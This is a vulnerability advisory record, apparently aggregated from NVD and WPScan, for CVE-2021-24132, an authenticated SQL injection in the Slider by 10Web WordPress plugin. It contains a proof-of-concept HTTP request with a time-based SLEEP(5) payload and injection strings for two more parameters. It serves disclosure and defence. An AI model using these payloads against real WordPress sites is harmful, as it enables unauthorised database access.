The Slider by 10Web WordPress plugin, versions before 1.2.36, in the bulk_action, export_full and save_slider_db functionalities of the plugin were vulnerable, allowing a high privileged user (Admin), or medium one such as Contributor+ (if "Role Options" is turn on for other users) to perform a SQL Injection attacks.
{"id": "CVE-2021-24132", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24132", "description": "The Slider by 10Web WordPress plugin, versions before 1.2.36, in the bulk_action, export_full and save_slider_db functionalities of the plugin were vulnerable, allowing a high privileged user (Admin), or medium one such as Contributor+ (if \"Role Options\" is turn on for other users) to perform a SQL Injection attacks.", "published": "2021-03-18T15:15:00", "modified": "2021-03-24T17:10:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24132", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/c1f45000-6c16-4606-be80-1938a755af2c"], "cvelist": ["CVE-2021-24132"], "immutableFields": [], "lastseen": "2022-03-23T14:47:25", "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:C1F45000-6C16-4606-BE80-1938A755AF2C"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:C1F45000-6C16-4606-BE80-1938A755AF2C"]}], "rev": 4}, "score": {"value": 4.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:C1F45000-6C16-4606-BE80-1938A755AF2C"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:C1F45000-6C16-4606-BE80-1938A755AF2C"]}]}, "exploitation": null, "vulnersScore": 4.1}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-89"], "affectedSoftware": [{"cpeName": "10web:slider", "version": "1.2.36", "operator": "lt", "name": "10web slider"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:10web:slider:1.2.36:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.2.36", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/c1f45000-6c16-4606-be80-1938a755af2c", "name": "N/A", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}]}
{"wpvulndb": [{"lastseen": "2021-02-15T22:22:23", "bulletinFamily": "software", "cvelist": ["CVE-2021-24132"], "description": "The bulk_action, export_full and save_slider_db functionalities of the plugin were vulnerable, allowing a high privileged user (Admin), or medium one such as Contributor+ (if \"Role Options\" is turn on for other users) to perform a SQL Injection attacks.\n\n### PoC\n\nVulnerable param: `check[]` Vulnerable function: WDW_S_Library::get ``` POST /wp-admin/admin.php?page=sliders_wds HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 201 s=&bulk;_action=duplicate&check;%5BSLEEP(5)%5D=on&select;_slider_merge=-select-&imagesexport;=on&nonce;_wd=e7f3386825&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dsliders_wds&task;=duplicate&current;_id= ``` Other SQLi: \\- File: admin/models/WDSModelWDSExport.php \\- Function: export_full \\- Params: slider_ids_string \\- PoC: Insert one slider with id = 1 and set $slider_ids_string to string: 1) AND SLEEP(5 \\- File: admin/controllers/Sliders.php \\- Function: save_slider_db \\- Params: del_slide_ids_string \\- PoC: Insert one slider with id = 1 and set $del_slide_ids_string to string: 1) AND SLEEP(5\n", "modified": "2021-01-21T06:02:45", "published": "2020-09-29T00:00:00", "id": "WPVDB-ID:C1F45000-6C16-4606-BE80-1938A755AF2C", "href": "https://wpscan.com/vulnerability/c1f45000-6c16-4606-be80-1938a755af2c", "type": "wpvulndb", "title": "Slider by 10Web < 1.2.36 - Multiple Authenticated SQL Injection", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "wpexploit": [{"lastseen": "2021-02-15T22:22:23", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-24132"], "description": "The bulk_action, export_full and save_slider_db functionalities of the plugin were vulnerable, allowing a high privileged user (Admin), or medium one such as Contributor+ (if \"Role Options\" is turn on for other users) to perform a SQL Injection attacks.\n", "modified": "2021-01-21T06:02:45", "published": "2020-09-29T00:00:00", "id": "WPEX-ID:C1F45000-6C16-4606-BE80-1938A755AF2C", "href": "", "type": "wpexploit", "title": "Slider by 10Web < 1.2.36 - Multiple Authenticated SQL Injection", "sourceData": "Vulnerable param: `check[]`\r\nVulnerable function: WDW_S_Library::get\r\n\r\n```\r\nPOST /wp-admin/admin.php?page=sliders_wds HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 201\r\n\r\ns=&bulk_action=duplicate&check%5BSLEEP(5)%5D=on&select_slider_merge=-select-&imagesexport=on&nonce_wd=e7f3386825&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dsliders_wds&task=duplicate¤t_id=\r\n```\r\n\r\nOther SQLi:\r\n\r\n- File: admin/models/WDSModelWDSExport.php\r\n- Function: export_full\r\n- Params: slider_ids_string\r\n- PoC: Insert one slider with id = 1 and set $slider_ids_string to string: 1) AND SLEEP(5\r\n\r\n- File: admin/controllers/Sliders.php\r\n- Function: save_slider_db\r\n- Params: del_slide_ids_string\r\n- PoC: Insert one slider with id = 1 and set $del_slide_ids_string to string: 1) AND SLEEP(5", "cvss": {"score": 0.0, "vector": "NONE"}}]}